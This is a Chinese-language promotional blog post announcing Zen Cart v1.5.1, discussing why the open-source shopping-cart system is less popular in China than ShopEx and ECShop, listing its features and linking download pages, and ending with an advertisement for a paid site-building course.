
好消息!購物網站 Zen Cart E-Commerce Shopping Cart
發佈新的版本 v1.5.1
早前Zen Cart E-Commerce Shopping Cart已經準備發佈新的版本,而我們日盼夜盼終於等到了zen cart v1.5.1正式發佈!

新版zencart比舊版作了不少修改,其中更有亮點之處。
由於缺少中文語系包,很多zencart商城並沒有在第一時間進行升級。

-------------------------------------------------------------------

attachments/201304/4600203081.jpg

為何國內不流行用 zen cart 架設購物網站?


 雖然在國外是最為流行的開源商城系統之一,但是zen-cart在國內卻不流行。
其實很多人卻不知道zen-cart與國內的主流的開源商城系統的區別。
 
比如說,shopex是國內主流的商城之一,收費不開源,操作還算比較簡單。
但是shopex一個「收費」就讓很多站長苦惱了!
國內免費開源商城系統還是有一個比較可以的ecshop,但是模板開發需要有網頁製作基礎才能很好地完成,而且ecshop自身對外貿表現沒有zen-cart好。
 
所以說,zencart是外貿網站建設偏好的php開源商城系統!
它針對谷歌搜尋引擎很好地進行了改善,而且功能強大,讓技術高深的站長都非常喜歡。

國內線上商城日益增加,但是卻很多都不是用zen cart建設的,為何呢?
一個全球最歡迎的開源商城系統,在國內竟然不能流行起來?

LikeZencart為此對不少站長進行了訪談,我們發現,其主要原因為是國人並不習慣操作這個「進口貨」!
反而shopex、ecshop等更為國內站長鎖熟悉。
另一方面,知名SEOer Orson Tsui指出,基於源程式,zen cart在百度seo上來說,與shopex等相比,沒有一定的優勢。
這是因為國內很多站長,其實並不太懂對程式的改善。
zen cart在的谷歌改善上的表現是毋庸置疑的,因此我們可以像用wordpress一樣對齊進行在百度上的改善。

也就是說,zencart二次開發的難度是國內不流行的最重要的因素之一。
-------------------------------------------------------------------
外貿網站建設為何選取 zen cart 架設購物網站?

zencart是國外主流的PHP開源商城系統之一,憑藉著產品對搜尋引擎的友好以及強大的功能獲得了不少歡迎。
外貿網站建設為何要選取zen cart呢?
 
zen cart的整體設計更符合國外訪客
 
zen cart是由銷售商、程式員、設計師和顧問共同開發的,以此得出的產品設計專案上來說更適合國外客戶的訪問習慣。
而且使得zen cart模板的製作多樣化、多元化。
 
zen cart以使用者需求作為基本知道路線
 
zencart受歡迎的原因更在於它不斷地完善自身,根據不同的使用者需求反饋而進行版本的升級。
你只需要懂基本知識就會安裝zencart,搭建你的電子商城。
而且zencart模板多,你可以不用設計即可獲得一個精美的網站。
zencart的使用者體驗還在各種操作流程上,比如簡單的三步就可以安全結賬。
--------------------------------------------------------------------------------
【文章標題】: 購物網站 Zen Cart E-Commerce Shopping Cart v1.5.1 【最新版】官方正版下載
【文章作者】: 購物網站架站教學密訓基地
【作者信箱】: ster168ster@gmail.com
【作者首頁】: http://por.tw/sale/
【購物網站架站教學課程】: http://por.tw/sale/cmmerse-4-all/index.php
【基地主機】: http://goto1688.com/sale/
【版權聲明】: (原創)購物網站架站教學密訓基地,轉載必須保留完整標頭。刪除者依法追究!

--------------------------------------------------------------------------------
我們列舉一下 zen cart 購物網站程式的特點:
 
 1.採用 zen cart 架設購物網站,安裝容易。   
 
 2.採用 zen cart 架設購物網站,容易定制。  
 
 3.採用 zen cart 架設購物網站,自動化,例如訂單確認   
 
 4.採用 zen cart 架設購物網站,方便瀏覽   
 
 5.內建的促銷、折扣、禮物券、新聞簡訊和商品知會功能   
 
 6.單件商品優惠或是全部商品折扣,團體優惠和大訂單優惠   
 
 7.內建搜尋改善工具
 
 8.密碼保護的管理員工具   
 
 9.支援多種語系、貨幣和稅率結構  
 
 簡而言之,Zen Cart內含了購物車軟體所應該具備的所有功能。

 購物網站 Zen Cart E-Commerce Shopping Cart 官方網址
  http://www.zen-cart.com/

購物網站 Zen Cart E-Commerce Shopping Cart v1.5.1 【最新版】官方正版下載
  http://sourceforge.net/projects/zencart/files/
--------------------------------------------------------------------------------
你在自己摸索如何架設購物網站.經商.網路賺錢嗎?您有【技術顧問服務】可諮詢嗎?
有問題無法解決要發很多時間處理(或許永遠找出答案)是自己摸索購物架站痛苦的開始!
購買【購物網站架站教學】DVD課程,就可獲得【購物網站架站】技術【顧問諮詢服務】!
購物網站架設教學【網路補習班】教學基地:致力於收集各類購物網站教育資料及技術資訊,便於本人和廣大網友及店家查詢檢索,無論公司或個人認為本站存在侵權內容均可與本站聯繫,任何此類反饋資訊一經查明屬實後,將立即移除!